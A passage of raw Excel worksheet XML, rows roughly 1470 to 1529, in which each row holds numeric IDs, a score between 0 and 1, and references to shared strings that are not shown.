      </c>
      <c r="D1470">
        <v>0</v>
      </c>
      <c r="E1470">
        <v>0.79259997606277466</v>
      </c>
      <c r="F1470" t="s">
        <v>7</v>
      </c>
      <c r="G1470" t="s">
        <v>2902</v>
      </c>
      <c r="H1470" t="s">
        <v>2614</v>
      </c>
    </row>
    <row r="1471" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1471" s="1">
        <v>1469</v>
      </c>
      <c r="B1471">
        <v>5049</v>
      </c>
      <c r="C1471">
        <v>5049</v>
      </c>
      <c r="D1471">
        <v>0</v>
      </c>
      <c r="E1471">
        <v>0.98269999027252197</v>
      </c>
      <c r="F1471" t="s">
        <v>7</v>
      </c>
      <c r="G1471" t="s">
        <v>2903</v>
      </c>
      <c r="H1471" t="s">
        <v>2904</v>
      </c>
    </row>
    <row r="1472" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1472" s="1">
        <v>1470</v>
      </c>
      <c r="B1472">
        <v>5297</v>
      </c>
      <c r="C1472">
        <v>5297</v>
      </c>
      <c r="D1472">
        <v>0</v>
      </c>
      <c r="E1472">
        <v>0.88609999418258667</v>
      </c>
      <c r="F1472" t="s">
        <v>7</v>
      </c>
      <c r="G1472" t="s">
        <v>2905</v>
      </c>
      <c r="H1472" t="s">
        <v>2906</v>
      </c>
    </row>
    <row r="1473" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1473" s="1">
        <v>1471</v>
      </c>
      <c r="B1473">
        <v>5593</v>
      </c>
      <c r="C1473">
        <v>5593</v>
      </c>
      <c r="D1473">
        <v>0</v>
      </c>
      <c r="E1473">
        <v>0.6348000168800354</v>
      </c>
      <c r="F1473" t="s">
        <v>7</v>
      </c>
      <c r="G1473" t="s">
        <v>2907</v>
      </c>
      <c r="H1473" t="s">
        <v>2908</v>
      </c>
    </row>
    <row r="1474" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1474" s="1">
        <v>1472</v>
      </c>
      <c r="B1474">
        <v>5525</v>
      </c>
      <c r="C1474">
        <v>5525</v>
      </c>
      <c r="D1474">
        <v>0</v>
      </c>
      <c r="E1474">
        <v>0.77910000085830688</v>
      </c>
      <c r="F1474" t="s">
        <v>7</v>
      </c>
      <c r="G1474" t="s">
        <v>2909</v>
      </c>
      <c r="H1474" t="s">
        <v>2910</v>
      </c>
    </row>
    <row r="1475" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1475" s="1">
        <v>1473</v>
      </c>
      <c r="B1475">
        <v>980</v>
      </c>
      <c r="C1475">
        <v>980</v>
      </c>
      <c r="D1475">
        <v>0</v>
      </c>
      <c r="E1475">
        <v>0.79290002584457397</v>
      </c>
      <c r="F1475" t="s">
        <v>7</v>
      </c>
      <c r="G1475" t="s">
        <v>2911</v>
      </c>
      <c r="H1475" t="s">
        <v>2912</v>
      </c>
    </row>
    <row r="1476" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1476" s="1">
        <v>1474</v>
      </c>
      <c r="B1476">
        <v>90</v>
      </c>
      <c r="C1476">
        <v>90</v>
      </c>
      <c r="D1476">
        <v>0</v>
      </c>
      <c r="E1476">
        <v>0.67979997396469116</v>
      </c>
      <c r="F1476" t="s">
        <v>7</v>
      </c>
      <c r="G1476" t="s">
        <v>2913</v>
      </c>
      <c r="H1476" t="s">
        <v>2914</v>
      </c>
    </row>
    <row r="1477" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1477" s="1">
        <v>1475</v>
      </c>
      <c r="B1477">
        <v>91</v>
      </c>
      <c r="C1477">
        <v>91</v>
      </c>
      <c r="D1477">
        <v>0</v>
      </c>
      <c r="E1477">
        <v>0.67239999771118164</v>
      </c>
      <c r="F1477" t="s">
        <v>7</v>
      </c>
      <c r="G1477" t="s">
        <v>2915</v>
      </c>
      <c r="H1477" t="s">
        <v>2916</v>
      </c>
    </row>
    <row r="1478" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1478" s="1">
        <v>1476</v>
      </c>
      <c r="B1478">
        <v>5024</v>
      </c>
      <c r="C1478">
        <v>5024</v>
      </c>
      <c r="D1478">
        <v>0</v>
      </c>
      <c r="E1478">
        <v>0.99330002069473267</v>
      </c>
      <c r="F1478" t="s">
        <v>7</v>
      </c>
      <c r="G1478" t="s">
        <v>2917</v>
      </c>
      <c r="H1478" t="s">
        <v>2918</v>
      </c>
    </row>
    <row r="1479" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1479" s="1">
        <v>1477</v>
      </c>
      <c r="B1479">
        <v>92</v>
      </c>
      <c r="C1479">
        <v>92</v>
      </c>
      <c r="D1479">
        <v>0</v>
      </c>
      <c r="E1479">
        <v>0.63779997825622559</v>
      </c>
      <c r="F1479" t="s">
        <v>7</v>
      </c>
      <c r="G1479" t="s">
        <v>2919</v>
      </c>
      <c r="H1479" t="s">
        <v>2920</v>
      </c>
    </row>
    <row r="1480" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1480" s="1">
        <v>1478</v>
      </c>
      <c r="B1480">
        <v>997</v>
      </c>
      <c r="C1480">
        <v>997</v>
      </c>
      <c r="D1480">
        <v>0</v>
      </c>
      <c r="E1480">
        <v>0.5900999903678894</v>
      </c>
      <c r="F1480" t="s">
        <v>7</v>
      </c>
      <c r="G1480" t="s">
        <v>2921</v>
      </c>
      <c r="H1480" t="s">
        <v>2922</v>
      </c>
    </row>
    <row r="1481" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1481" s="1">
        <v>1479</v>
      </c>
      <c r="B1481">
        <v>996</v>
      </c>
      <c r="C1481">
        <v>996</v>
      </c>
      <c r="D1481">
        <v>0</v>
      </c>
      <c r="E1481">
        <v>0.71170002222061157</v>
      </c>
      <c r="F1481" t="s">
        <v>7</v>
      </c>
      <c r="G1481" t="s">
        <v>2923</v>
      </c>
      <c r="H1481" t="s">
        <v>2924</v>
      </c>
    </row>
    <row r="1482" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1482" s="1">
        <v>1480</v>
      </c>
      <c r="B1482">
        <v>5027</v>
      </c>
      <c r="C1482">
        <v>5027</v>
      </c>
      <c r="D1482">
        <v>0</v>
      </c>
      <c r="E1482">
        <v>0.97030001878738403</v>
      </c>
      <c r="F1482" t="s">
        <v>7</v>
      </c>
      <c r="G1482" t="s">
        <v>2925</v>
      </c>
      <c r="H1482" t="s">
        <v>2926</v>
      </c>
    </row>
    <row r="1483" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1483" s="1">
        <v>1481</v>
      </c>
      <c r="B1483">
        <v>5028</v>
      </c>
      <c r="C1483">
        <v>5028</v>
      </c>
      <c r="D1483">
        <v>0</v>
      </c>
      <c r="E1483">
        <v>0.99550002813339233</v>
      </c>
      <c r="F1483" t="s">
        <v>7</v>
      </c>
      <c r="G1483" t="s">
        <v>2927</v>
      </c>
      <c r="H1483" t="s">
        <v>2928</v>
      </c>
    </row>
    <row r="1484" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1484" s="1">
        <v>1482</v>
      </c>
      <c r="B1484">
        <v>5029</v>
      </c>
      <c r="C1484">
        <v>5029</v>
      </c>
      <c r="D1484">
        <v>0</v>
      </c>
      <c r="E1484">
        <v>0.99290001392364502</v>
      </c>
      <c r="F1484" t="s">
        <v>7</v>
      </c>
      <c r="G1484" t="s">
        <v>2929</v>
      </c>
      <c r="H1484" t="s">
        <v>2930</v>
      </c>
    </row>
    <row r="1485" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1485" s="1">
        <v>1483</v>
      </c>
      <c r="B1485">
        <v>94</v>
      </c>
      <c r="C1485">
        <v>94</v>
      </c>
      <c r="D1485">
        <v>0</v>
      </c>
      <c r="E1485">
        <v>0.93360000848770142</v>
      </c>
      <c r="F1485" t="s">
        <v>7</v>
      </c>
      <c r="G1485" t="s">
        <v>2931</v>
      </c>
      <c r="H1485" t="s">
        <v>2932</v>
      </c>
    </row>
    <row r="1486" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1486" s="1">
        <v>1484</v>
      </c>
      <c r="B1486">
        <v>7691</v>
      </c>
      <c r="C1486">
        <v>7691</v>
      </c>
      <c r="D1486">
        <v>0</v>
      </c>
      <c r="E1486">
        <v>0.87919998168945313</v>
      </c>
      <c r="F1486" t="s">
        <v>7</v>
      </c>
      <c r="G1486" t="s">
        <v>2933</v>
      </c>
      <c r="H1486" t="s">
        <v>2934</v>
      </c>
    </row>
    <row r="1487" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1487" s="1">
        <v>1485</v>
      </c>
      <c r="B1487">
        <v>95</v>
      </c>
      <c r="C1487">
        <v>95</v>
      </c>
      <c r="D1487">
        <v>0</v>
      </c>
      <c r="E1487">
        <v>0.4781000018119812</v>
      </c>
      <c r="F1487" t="s">
        <v>7</v>
      </c>
      <c r="G1487" t="s">
        <v>2935</v>
      </c>
      <c r="H1487" t="s">
        <v>2936</v>
      </c>
    </row>
    <row r="1488" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1488" s="1">
        <v>1486</v>
      </c>
      <c r="B1488">
        <v>5031</v>
      </c>
      <c r="C1488">
        <v>5031</v>
      </c>
      <c r="D1488">
        <v>0</v>
      </c>
      <c r="E1488">
        <v>0.696399986743927</v>
      </c>
      <c r="F1488" t="s">
        <v>7</v>
      </c>
      <c r="G1488" t="s">
        <v>2937</v>
      </c>
      <c r="H1488" t="s">
        <v>2938</v>
      </c>
    </row>
    <row r="1489" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1489" s="1">
        <v>1487</v>
      </c>
      <c r="B1489">
        <v>987</v>
      </c>
      <c r="C1489">
        <v>987</v>
      </c>
      <c r="D1489">
        <v>0</v>
      </c>
      <c r="E1489">
        <v>0.59539997577667236</v>
      </c>
      <c r="F1489" t="s">
        <v>7</v>
      </c>
      <c r="G1489" t="s">
        <v>2939</v>
      </c>
      <c r="H1489" t="s">
        <v>2940</v>
      </c>
    </row>
    <row r="1490" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1490" s="1">
        <v>1488</v>
      </c>
      <c r="B1490">
        <v>5033</v>
      </c>
      <c r="C1490">
        <v>5033</v>
      </c>
      <c r="D1490">
        <v>0</v>
      </c>
      <c r="E1490">
        <v>0.73259997367858887</v>
      </c>
      <c r="F1490" t="s">
        <v>7</v>
      </c>
      <c r="G1490" t="s">
        <v>2941</v>
      </c>
      <c r="H1490" t="s">
        <v>2942</v>
      </c>
    </row>
    <row r="1491" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1491" s="1">
        <v>1489</v>
      </c>
      <c r="B1491">
        <v>7690</v>
      </c>
      <c r="C1491">
        <v>7690</v>
      </c>
      <c r="D1491">
        <v>0</v>
      </c>
      <c r="E1491">
        <v>0.52109998464584351</v>
      </c>
      <c r="F1491" t="s">
        <v>7</v>
      </c>
      <c r="G1491" t="s">
        <v>2943</v>
      </c>
      <c r="H1491" t="s">
        <v>2944</v>
      </c>
    </row>
    <row r="1492" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1492" s="1">
        <v>1490</v>
      </c>
      <c r="B1492">
        <v>7468</v>
      </c>
      <c r="C1492">
        <v>7468</v>
      </c>
      <c r="D1492">
        <v>0</v>
      </c>
      <c r="E1492">
        <v>0.99839997291564941</v>
      </c>
      <c r="F1492" t="s">
        <v>7</v>
      </c>
      <c r="G1492" t="s">
        <v>2945</v>
      </c>
      <c r="H1492" t="s">
        <v>2946</v>
      </c>
    </row>
    <row r="1493" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1493" s="1">
        <v>1491</v>
      </c>
      <c r="B1493">
        <v>5035</v>
      </c>
      <c r="C1493">
        <v>5035</v>
      </c>
      <c r="D1493">
        <v>0</v>
      </c>
      <c r="E1493">
        <v>0.57130002975463867</v>
      </c>
      <c r="F1493" t="s">
        <v>7</v>
      </c>
      <c r="G1493" t="s">
        <v>2947</v>
      </c>
      <c r="H1493" t="s">
        <v>2948</v>
      </c>
    </row>
    <row r="1494" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1494" s="1">
        <v>1492</v>
      </c>
      <c r="B1494">
        <v>983</v>
      </c>
      <c r="C1494">
        <v>983</v>
      </c>
      <c r="D1494">
        <v>0</v>
      </c>
      <c r="E1494">
        <v>0.89399999380111694</v>
      </c>
      <c r="F1494" t="s">
        <v>7</v>
      </c>
      <c r="G1494" t="s">
        <v>2949</v>
      </c>
      <c r="H1494" t="s">
        <v>2950</v>
      </c>
    </row>
    <row r="1495" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1495" s="1">
        <v>1493</v>
      </c>
      <c r="B1495">
        <v>530</v>
      </c>
      <c r="C1495">
        <v>530</v>
      </c>
      <c r="D1495">
        <v>0</v>
      </c>
      <c r="E1495">
        <v>0.9724000096321106</v>
      </c>
      <c r="F1495" t="s">
        <v>7</v>
      </c>
      <c r="G1495" t="s">
        <v>2951</v>
      </c>
      <c r="H1495" t="s">
        <v>2952</v>
      </c>
    </row>
    <row r="1496" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1496" s="1">
        <v>1494</v>
      </c>
      <c r="B1496">
        <v>531</v>
      </c>
      <c r="C1496">
        <v>531</v>
      </c>
      <c r="D1496">
        <v>0</v>
      </c>
      <c r="E1496">
        <v>0.97269999980926514</v>
      </c>
      <c r="F1496" t="s">
        <v>7</v>
      </c>
      <c r="G1496" t="s">
        <v>2953</v>
      </c>
      <c r="H1496" t="s">
        <v>2952</v>
      </c>
    </row>
    <row r="1497" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1497" s="1">
        <v>1495</v>
      </c>
      <c r="B1497">
        <v>7471</v>
      </c>
      <c r="C1497">
        <v>7471</v>
      </c>
      <c r="D1497">
        <v>0</v>
      </c>
      <c r="E1497">
        <v>0.82370001077651978</v>
      </c>
      <c r="F1497" t="s">
        <v>7</v>
      </c>
      <c r="G1497" t="s">
        <v>2954</v>
      </c>
      <c r="H1497" t="s">
        <v>2955</v>
      </c>
    </row>
    <row r="1498" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1498" s="1">
        <v>1496</v>
      </c>
      <c r="B1498">
        <v>96</v>
      </c>
      <c r="C1498">
        <v>96</v>
      </c>
      <c r="D1498">
        <v>0</v>
      </c>
      <c r="E1498">
        <v>0.74819999933242798</v>
      </c>
      <c r="F1498" t="s">
        <v>7</v>
      </c>
      <c r="G1498" t="s">
        <v>2956</v>
      </c>
      <c r="H1498" t="s">
        <v>2957</v>
      </c>
    </row>
    <row r="1499" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1499" s="1">
        <v>1497</v>
      </c>
      <c r="B1499">
        <v>5710</v>
      </c>
      <c r="C1499">
        <v>5710</v>
      </c>
      <c r="D1499">
        <v>0</v>
      </c>
      <c r="E1499">
        <v>0.99699997901916504</v>
      </c>
      <c r="F1499" t="s">
        <v>7</v>
      </c>
      <c r="G1499" t="s">
        <v>2958</v>
      </c>
      <c r="H1499" t="s">
        <v>2959</v>
      </c>
    </row>
    <row r="1500" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1500" s="1">
        <v>1498</v>
      </c>
      <c r="B1500">
        <v>860</v>
      </c>
      <c r="C1500">
        <v>860</v>
      </c>
      <c r="D1500">
        <v>0</v>
      </c>
      <c r="E1500">
        <v>0.58939999341964722</v>
      </c>
      <c r="F1500" t="s">
        <v>7</v>
      </c>
      <c r="G1500" t="s">
        <v>2960</v>
      </c>
      <c r="H1500" t="s">
        <v>2961</v>
      </c>
    </row>
    <row r="1501" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1501" s="1">
        <v>1499</v>
      </c>
      <c r="B1501">
        <v>859</v>
      </c>
      <c r="C1501">
        <v>859</v>
      </c>
      <c r="D1501">
        <v>0</v>
      </c>
      <c r="E1501">
        <v>0.66790002584457397</v>
      </c>
      <c r="F1501" t="s">
        <v>7</v>
      </c>
      <c r="G1501" t="s">
        <v>2962</v>
      </c>
      <c r="H1501" t="s">
        <v>2963</v>
      </c>
    </row>
    <row r="1502" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1502" s="1">
        <v>1500</v>
      </c>
      <c r="B1502">
        <v>7579</v>
      </c>
      <c r="C1502">
        <v>7579</v>
      </c>
      <c r="D1502">
        <v>0</v>
      </c>
      <c r="E1502">
        <v>0.78189998865127563</v>
      </c>
      <c r="F1502" t="s">
        <v>7</v>
      </c>
      <c r="G1502" t="s">
        <v>2964</v>
      </c>
      <c r="H1502" t="s">
        <v>2965</v>
      </c>
    </row>
    <row r="1503" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1503" s="1">
        <v>1501</v>
      </c>
      <c r="B1503">
        <v>7643</v>
      </c>
      <c r="C1503">
        <v>7643</v>
      </c>
      <c r="D1503">
        <v>0</v>
      </c>
      <c r="E1503">
        <v>0.39379999041557312</v>
      </c>
      <c r="F1503" t="s">
        <v>7</v>
      </c>
      <c r="G1503" t="s">
        <v>2966</v>
      </c>
      <c r="H1503" t="s">
        <v>2967</v>
      </c>
    </row>
    <row r="1504" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1504" s="1">
        <v>1502</v>
      </c>
      <c r="B1504">
        <v>7839</v>
      </c>
      <c r="C1504">
        <v>7839</v>
      </c>
      <c r="D1504">
        <v>0</v>
      </c>
      <c r="E1504">
        <v>0.95389997959136963</v>
      </c>
      <c r="F1504" t="s">
        <v>7</v>
      </c>
      <c r="G1504" t="s">
        <v>2968</v>
      </c>
      <c r="H1504" t="s">
        <v>2969</v>
      </c>
    </row>
    <row r="1505" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1505" s="1">
        <v>1503</v>
      </c>
      <c r="B1505">
        <v>5622</v>
      </c>
      <c r="C1505">
        <v>5622</v>
      </c>
      <c r="D1505">
        <v>0</v>
      </c>
      <c r="E1505">
        <v>0.53339999914169312</v>
      </c>
      <c r="F1505" t="s">
        <v>7</v>
      </c>
      <c r="G1505" t="s">
        <v>2970</v>
      </c>
      <c r="H1505" t="s">
        <v>2971</v>
      </c>
    </row>
    <row r="1506" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1506" s="1">
        <v>1504</v>
      </c>
      <c r="B1506">
        <v>650</v>
      </c>
      <c r="C1506">
        <v>650</v>
      </c>
      <c r="D1506">
        <v>0</v>
      </c>
      <c r="E1506">
        <v>0.93209999799728394</v>
      </c>
      <c r="F1506" t="s">
        <v>7</v>
      </c>
      <c r="G1506" t="s">
        <v>2972</v>
      </c>
      <c r="H1506" t="s">
        <v>2973</v>
      </c>
    </row>
    <row r="1507" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1507" s="1">
        <v>1505</v>
      </c>
      <c r="B1507">
        <v>651</v>
      </c>
      <c r="C1507">
        <v>651</v>
      </c>
      <c r="D1507">
        <v>0</v>
      </c>
      <c r="E1507">
        <v>0.91170001029968262</v>
      </c>
      <c r="F1507" t="s">
        <v>7</v>
      </c>
      <c r="G1507" t="s">
        <v>2974</v>
      </c>
      <c r="H1507" t="s">
        <v>2975</v>
      </c>
    </row>
    <row r="1508" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1508" s="1">
        <v>1506</v>
      </c>
      <c r="B1508">
        <v>652</v>
      </c>
      <c r="C1508">
        <v>652</v>
      </c>
      <c r="D1508">
        <v>0</v>
      </c>
      <c r="E1508">
        <v>0.66200000047683716</v>
      </c>
      <c r="F1508" t="s">
        <v>7</v>
      </c>
      <c r="G1508" t="s">
        <v>2976</v>
      </c>
      <c r="H1508" t="s">
        <v>2977</v>
      </c>
    </row>
    <row r="1509" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1509" s="1">
        <v>1507</v>
      </c>
      <c r="B1509">
        <v>7822</v>
      </c>
      <c r="C1509">
        <v>7822</v>
      </c>
      <c r="D1509">
        <v>0</v>
      </c>
      <c r="E1509">
        <v>0.99739998579025269</v>
      </c>
      <c r="F1509" t="s">
        <v>7</v>
      </c>
      <c r="G1509" t="s">
        <v>2978</v>
      </c>
      <c r="H1509" t="s">
        <v>2979</v>
      </c>
    </row>
    <row r="1510" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1510" s="1">
        <v>1508</v>
      </c>
      <c r="B1510">
        <v>654</v>
      </c>
      <c r="C1510">
        <v>654</v>
      </c>
      <c r="D1510">
        <v>0</v>
      </c>
      <c r="E1510">
        <v>0.52340000867843628</v>
      </c>
      <c r="F1510" t="s">
        <v>7</v>
      </c>
      <c r="G1510" t="s">
        <v>2980</v>
      </c>
      <c r="H1510" t="s">
        <v>2981</v>
      </c>
    </row>
    <row r="1511" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1511" s="1">
        <v>1509</v>
      </c>
      <c r="B1511">
        <v>742</v>
      </c>
      <c r="C1511">
        <v>742</v>
      </c>
      <c r="D1511">
        <v>0</v>
      </c>
      <c r="E1511">
        <v>0.74900001287460327</v>
      </c>
      <c r="F1511" t="s">
        <v>7</v>
      </c>
      <c r="G1511" t="s">
        <v>2982</v>
      </c>
      <c r="H1511" t="s">
        <v>2983</v>
      </c>
    </row>
    <row r="1512" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1512" s="1">
        <v>1510</v>
      </c>
      <c r="B1512">
        <v>655</v>
      </c>
      <c r="C1512">
        <v>655</v>
      </c>
      <c r="D1512">
        <v>0</v>
      </c>
      <c r="E1512">
        <v>0.66689997911453247</v>
      </c>
      <c r="F1512" t="s">
        <v>7</v>
      </c>
      <c r="G1512" t="s">
        <v>2984</v>
      </c>
      <c r="H1512" t="s">
        <v>2985</v>
      </c>
    </row>
    <row r="1513" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1513" s="1">
        <v>1511</v>
      </c>
      <c r="B1513">
        <v>5739</v>
      </c>
      <c r="C1513">
        <v>5739</v>
      </c>
      <c r="D1513">
        <v>0</v>
      </c>
      <c r="E1513">
        <v>0.53530001640319824</v>
      </c>
      <c r="F1513" t="s">
        <v>7</v>
      </c>
      <c r="G1513" t="s">
        <v>2986</v>
      </c>
      <c r="H1513" t="s">
        <v>2987</v>
      </c>
    </row>
    <row r="1514" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1514" s="1">
        <v>1512</v>
      </c>
      <c r="B1514">
        <v>740</v>
      </c>
      <c r="C1514">
        <v>740</v>
      </c>
      <c r="D1514">
        <v>0</v>
      </c>
      <c r="E1514">
        <v>0.59890002012252808</v>
      </c>
      <c r="F1514" t="s">
        <v>7</v>
      </c>
      <c r="G1514" t="s">
        <v>2988</v>
      </c>
      <c r="H1514" t="s">
        <v>2989</v>
      </c>
    </row>
    <row r="1515" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1515" s="1">
        <v>1513</v>
      </c>
      <c r="B1515">
        <v>5190</v>
      </c>
      <c r="C1515">
        <v>5190</v>
      </c>
      <c r="D1515">
        <v>0</v>
      </c>
      <c r="E1515">
        <v>0.6064000129699707</v>
      </c>
      <c r="F1515" t="s">
        <v>7</v>
      </c>
      <c r="G1515" t="s">
        <v>2990</v>
      </c>
      <c r="H1515" t="s">
        <v>2991</v>
      </c>
    </row>
    <row r="1516" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1516" s="1">
        <v>1514</v>
      </c>
      <c r="B1516">
        <v>5191</v>
      </c>
      <c r="C1516">
        <v>5191</v>
      </c>
      <c r="D1516">
        <v>0</v>
      </c>
      <c r="E1516">
        <v>0.97960001230239868</v>
      </c>
      <c r="F1516" t="s">
        <v>7</v>
      </c>
      <c r="G1516" t="s">
        <v>2992</v>
      </c>
      <c r="H1516" t="s">
        <v>2993</v>
      </c>
    </row>
    <row r="1517" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1517" s="1">
        <v>1515</v>
      </c>
      <c r="B1517">
        <v>7641</v>
      </c>
      <c r="C1517">
        <v>7641</v>
      </c>
      <c r="D1517">
        <v>0</v>
      </c>
      <c r="E1517">
        <v>0.99260002374649048</v>
      </c>
      <c r="F1517" t="s">
        <v>7</v>
      </c>
      <c r="G1517" t="s">
        <v>2994</v>
      </c>
      <c r="H1517" t="s">
        <v>2995</v>
      </c>
    </row>
    <row r="1518" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1518" s="1">
        <v>1516</v>
      </c>
      <c r="B1518">
        <v>737</v>
      </c>
      <c r="C1518">
        <v>737</v>
      </c>
      <c r="D1518">
        <v>0</v>
      </c>
      <c r="E1518">
        <v>0.71909999847412109</v>
      </c>
      <c r="F1518" t="s">
        <v>7</v>
      </c>
      <c r="G1518" t="s">
        <v>2996</v>
      </c>
      <c r="H1518" t="s">
        <v>2997</v>
      </c>
    </row>
    <row r="1519" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1519" s="1">
        <v>1517</v>
      </c>
      <c r="B1519">
        <v>7640</v>
      </c>
      <c r="C1519">
        <v>7640</v>
      </c>
      <c r="D1519">
        <v>0</v>
      </c>
      <c r="E1519">
        <v>0.72170001268386841</v>
      </c>
      <c r="F1519" t="s">
        <v>7</v>
      </c>
      <c r="G1519" t="s">
        <v>2998</v>
      </c>
      <c r="H1519" t="s">
        <v>2999</v>
      </c>
    </row>
    <row r="1520" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1520" s="1">
        <v>1518</v>
      </c>
      <c r="B1520">
        <v>211</v>
      </c>
      <c r="C1520">
        <v>211</v>
      </c>
      <c r="D1520">
        <v>0</v>
      </c>
      <c r="E1520">
        <v>0.6525999903678894</v>
      </c>
      <c r="F1520" t="s">
        <v>7</v>
      </c>
      <c r="G1520" t="s">
        <v>3000</v>
      </c>
      <c r="H1520" t="s">
        <v>3001</v>
      </c>
    </row>
    <row r="1521" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1521" s="1">
        <v>1519</v>
      </c>
      <c r="B1521">
        <v>736</v>
      </c>
      <c r="C1521">
        <v>736</v>
      </c>
      <c r="D1521">
        <v>0</v>
      </c>
      <c r="E1521">
        <v>0.8367999792098999</v>
      </c>
      <c r="F1521" t="s">
        <v>7</v>
      </c>
      <c r="G1521" t="s">
        <v>3002</v>
      </c>
      <c r="H1521" t="s">
        <v>3003</v>
      </c>
    </row>
    <row r="1522" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1522" s="1">
        <v>1520</v>
      </c>
      <c r="B1522">
        <v>7585</v>
      </c>
      <c r="C1522">
        <v>7585</v>
      </c>
      <c r="D1522">
        <v>0</v>
      </c>
      <c r="E1522">
        <v>0.81129997968673706</v>
      </c>
      <c r="F1522" t="s">
        <v>7</v>
      </c>
      <c r="G1522" t="s">
        <v>3004</v>
      </c>
      <c r="H1522" t="s">
        <v>3005</v>
      </c>
    </row>
    <row r="1523" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1523" s="1">
        <v>1521</v>
      </c>
      <c r="B1523">
        <v>7840</v>
      </c>
      <c r="C1523">
        <v>7840</v>
      </c>
      <c r="D1523">
        <v>0</v>
      </c>
      <c r="E1523">
        <v>0.85699999332427979</v>
      </c>
      <c r="F1523" t="s">
        <v>7</v>
      </c>
      <c r="G1523" t="s">
        <v>3006</v>
      </c>
      <c r="H1523" t="s">
        <v>3007</v>
      </c>
    </row>
    <row r="1524" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1524" s="1">
        <v>1522</v>
      </c>
      <c r="B1524">
        <v>5741</v>
      </c>
      <c r="C1524">
        <v>5741</v>
      </c>
      <c r="D1524">
        <v>0</v>
      </c>
      <c r="E1524">
        <v>0.55989998579025269</v>
      </c>
      <c r="F1524" t="s">
        <v>7</v>
      </c>
      <c r="G1524" t="s">
        <v>3008</v>
      </c>
      <c r="H1524" t="s">
        <v>3009</v>
      </c>
    </row>
    <row r="1525" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1525" s="1">
        <v>1523</v>
      </c>
      <c r="B1525">
        <v>7578</v>
      </c>
      <c r="C1525">
        <v>7578</v>
      </c>
      <c r="D1525">
        <v>0</v>
      </c>
      <c r="E1525">
        <v>0.79009997844696045</v>
      </c>
      <c r="F1525" t="s">
        <v>7</v>
      </c>
      <c r="G1525" t="s">
        <v>3010</v>
      </c>
      <c r="H1525" t="s">
        <v>3011</v>
      </c>
    </row>
    <row r="1526" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1526" s="1">
        <v>1524</v>
      </c>
      <c r="B1526">
        <v>203</v>
      </c>
      <c r="C1526">
        <v>203</v>
      </c>
      <c r="D1526">
        <v>0</v>
      </c>
      <c r="E1526">
        <v>0.9869999885559082</v>
      </c>
      <c r="F1526" t="s">
        <v>7</v>
      </c>
      <c r="G1526" t="s">
        <v>3012</v>
      </c>
      <c r="H1526" t="s">
        <v>3013</v>
      </c>
    </row>
    <row r="1527" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1527" s="1">
        <v>1525</v>
      </c>
      <c r="B1527">
        <v>7645</v>
      </c>
      <c r="C1527">
        <v>7645</v>
      </c>
      <c r="D1527">
        <v>0</v>
      </c>
      <c r="E1527">
        <v>0.7839999794960022</v>
      </c>
      <c r="F1527" t="s">
        <v>7</v>
      </c>
      <c r="G1527" t="s">
        <v>3014</v>
      </c>
      <c r="H1527" t="s">
        <v>3015</v>
      </c>
    </row>
    <row r="1528" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1528" s="1">
        <v>1526</v>
      </c>
      <c r="B1528">
        <v>638</v>
      </c>
      <c r="C1528">
        <v>638</v>
      </c>
      <c r="D1528">
        <v>0</v>
      </c>
      <c r="E1528">
        <v>0.61119997501373291</v>
      </c>
      <c r="F1528" t="s">
        <v>7</v>
      </c>
      <c r="G1528" t="s">
        <v>3016</v>
      </c>
      <c r="H1528" t="s">
        <v>3017</v>
      </c>
    </row>
    <row r="1529" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1529" s="1">
        <v>1527</v>
